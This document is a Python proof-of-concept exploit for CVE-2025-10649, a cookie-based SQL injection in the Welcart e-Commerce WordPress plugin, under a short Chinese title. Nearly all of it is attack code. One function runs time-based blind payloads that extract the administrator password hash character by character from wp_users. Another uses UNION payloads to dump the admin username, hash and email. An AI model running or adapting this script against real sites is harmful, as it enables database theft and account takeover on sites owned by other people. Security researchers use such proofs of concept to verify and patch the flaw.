CVE-2025-10649：Welcart e-Commerce插件SQL注入漏洞

# CVE-2025-10649 - Welcart e-Commerce SQL Injection PoC # Vulnerability: Cookie-based SQL Injection in Welcart e-Commerce plugin # Affected versions: <= 2.11.21 # Required privilege: Author-level access or above import requests import sys TARGET_URL = "http://target-wordpress-site.com" AUTH_COOKIE = "wordpress_logged_in_xxxxx=your_auth_cookie_here" # Author-level session cookie def exploit_sqli(target_url, auth_cookie, injection_payload): """ Exploit the SQL injection vulnerability via Cookie manipulation. The vulnerable parameter is within a cookie value processed by the plugin. """ # Craft the malicious cookie with SQL injection payload malicious_cookie = f"usces_cookie={injection_payload}; {auth_cookie}" headers = { "Cookie": malicious_cookie, "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" } # Trigger the vulnerable code path response = requests.get(target_url, headers=headers) return response def extract_data_time_based(target_url, auth_cookie): """ Time-based blind SQL injection to extract sensitive data. Example: Extract admin password hash character by character. """ extracted = "" for position in range(1, 50): for ascii_val in range(32, 127): # MySQL time-based blind injection payload # IF condition checks each character of the admin password hash payload = f"1' AND IF(ASCII(SUBSTRING((SELECT user_pass FROM wp_users WHERE ID=1),{position},1))={ascii_val},SLEEP(2),0)-- -" import time start_time = time.time() response = exploit_sqli(target_url, auth_cookie, payload) elapsed = time.time() - start_time if elapsed >= 2: # If SLEEP triggered, we found the character extracted += chr(ascii_val) print(f"[+] Position {position}: {chr(ascii_val)} (Hash so far: {extracted})") break else: break return extracted def extract_data_union_based(target_url, auth_cookie): """ UNION-based SQL injection to extract data directly. """ # First determine the number of columns for cols in range(1, 15): nulls = ",".join(["NULL"] * cols) payload = f"1' UNION SELECT {nulls}-- -" response = exploit_sqli(target_url, auth_cookie, payload) if response.status_code == 200: print(f"[+] Number of columns: {cols}") break # Extract admin credentials payload = f"1' UNION SELECT user_login,user_pass,user_email,{','.join(['NULL']*(cols-3))} FROM wp_users WHERE ID=1-- -" response = exploit_sqli(target_url, auth_cookie, payload) print(f"[+] Response: {response.text[:500]}") if __name__ == "__main__": print("[*] CVE-2025-10649 - Welcart e-Commerce SQL Injection PoC") print("[*] This PoC requires Author-level authenticated access") # Example usage (uncomment to use): # extract_data_time_based(TARGET_URL, AUTH_COOKIE) # extract_data_union_based(TARGET_URL, AUTH_COOKIE) print("[*] Please configure TARGET_URL and AUTH_COOKIE before running")